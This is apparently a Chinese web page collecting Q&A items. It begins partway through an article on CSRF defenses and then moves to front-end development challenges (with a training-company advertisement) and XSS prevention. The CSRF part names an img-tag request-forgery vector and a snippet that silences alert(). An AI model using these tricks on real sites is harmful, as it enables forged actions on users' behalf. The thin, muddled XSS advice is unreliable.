无论是普通的请求令牌还是验证码，服务器端验证过一定记得销毁。忘记销毁用过的令牌是个很低级但是杀伤力很大的错误。我们学校的选课系统就有这个 问题，验证码用完并未销毁，故只要获取一次验证码图片，其中的验证码可以在多次请求中使用（只要不再次刷新验证码图片），一直用到 Session 超时。这也是为何选课系统加了验证码，外挂软件升级一次之后仍然畅通无阻。

如下也列出一些据说能有效防范 CSRF，其实效果甚微的方式甚至无效的做法。

通过 referer 判定来源页面：referer 是在 HTTP Request Head 里面的，也就是由请求的发送者决定的。如果我喜欢，可以给 referer 任何值。当然这个做法并不是毫无作用，起码可以防小白。但我觉得性价比不如令牌。

过滤所有用户发布的链接：这个是最无效的做法，因为首先攻击者不一定要从站内发起请求（上面提到过了），而且就算从站内发起请求，途径也远远不知链接一条。比如 img src="./create_post.php" / 就是个不错的选择，还不需要用户去点击，只要用户的浏览器会自动加载图片，就会自动发起请求。 *在请求发起页面用 alert 弹窗提醒用户：这个方法看上去能干扰站外通过 iframe 发起的 CSRF，但攻击者也可以考虑用 window.alert = function(){}; 把 alert 弄哑，或者干脆脱离 iframe，使用 Flash 来达到目的。

总体来说，目前防御 CSRF 的诸多方法还没几个能彻底无解的。所以 CSDN 上看到讨论 CSRF 的文章，一般都会含有“无耻”二字来形容（另一位有该名号的貌似是 DDOS 攻击）。作为开发者，我们能做的就是尽量提高破解难度。当破解难度达到一定程度，网站就逼近于绝对安全的位置了（虽然不能到达）。上述请求令牌方法，就我 认为是最有可扩展性的，因为其原理和 CSRF 原理是相克的。CSRF 难以防御之处就在于对服务器端来说，伪造的请求和正常的请求本质上是一致的。而请求令牌的方法，则是揪出这种请求上的唯一区别——来源页面不同。我们还可 以做进一步的工作，例如让页面中 token 的 key 动态化，进一步提高攻击者的门槛。本文只是我个人认识的一个总结，便不讨论过深了。

web前端开发面临的挑战主要是有哪些？

web前端面临的挑战：

1.兼容性：市场上浏览器种类非常多，IE、Firefox、Chrome、Opera、还有众多的IE加壳浏览器，类似搜狗、傲游、360，再加上这些浏览器的移动终端版本。需要有Web标准，前端的知识大部分通用于各个浏览器，但还是会有历史遗留问题，不同版本的浏览器有不同的问题。

2.交互复杂度：和目前UI交互的要求比，浏览器引擎给我们的接口太低级了，稍复杂一点的UI效果，都要前端自己利用CSS和DOM去组合创造，前端的效果是通过CSS、DOM、JS三者配合起来呈现出来的，脱了任何一个技术都寸步难行，时刻要同时考虑多个方向的知识点。

3.代码可维护性：复杂度的提升直接影响代码的维护性。JS/CSS/HTML代码生命周期越来越长，也就越来越需要从代码质量、架构和工具上保证他们的可维护性。

4.技术更新快：前端技术更新速度十分快，html5，css3，nodejs，commonjs，按需加载等都是近几年出来的，我们必须与时俱进，不断加强技术水平，不断学习，不然就会被淘汰。

5.开发者思路：真正的前端开发挑战，还在于开发者的思路。

想要了解更多有关web前端的相关信息，推荐咨询千锋教育。千锋教育成立教研学科中心，推出贴近企业需求的线下技能培训课程。采用全程面授高品质、高体验培养模式，学科大纲紧跟企业需求，拥有国内一体化教学管理及学员服务，在职业教育发展道路上不断探索前行。

如何解决繁琐的WEB前端的XSS问题

后台做一层过滤，前台文本编辑器可以自己做一层标签过滤，不允许一些符号的输入就行了

xss攻击前端能做的有限

因为好多都是url转码来通过参数找漏洞，所以后台也要做一层过滤（例如nodejs的sql库就只允许单行sql，防止通过xss做注入）java之类的有现成多xss过滤器

剩下的就做ip黑名单吧，防止多次攻击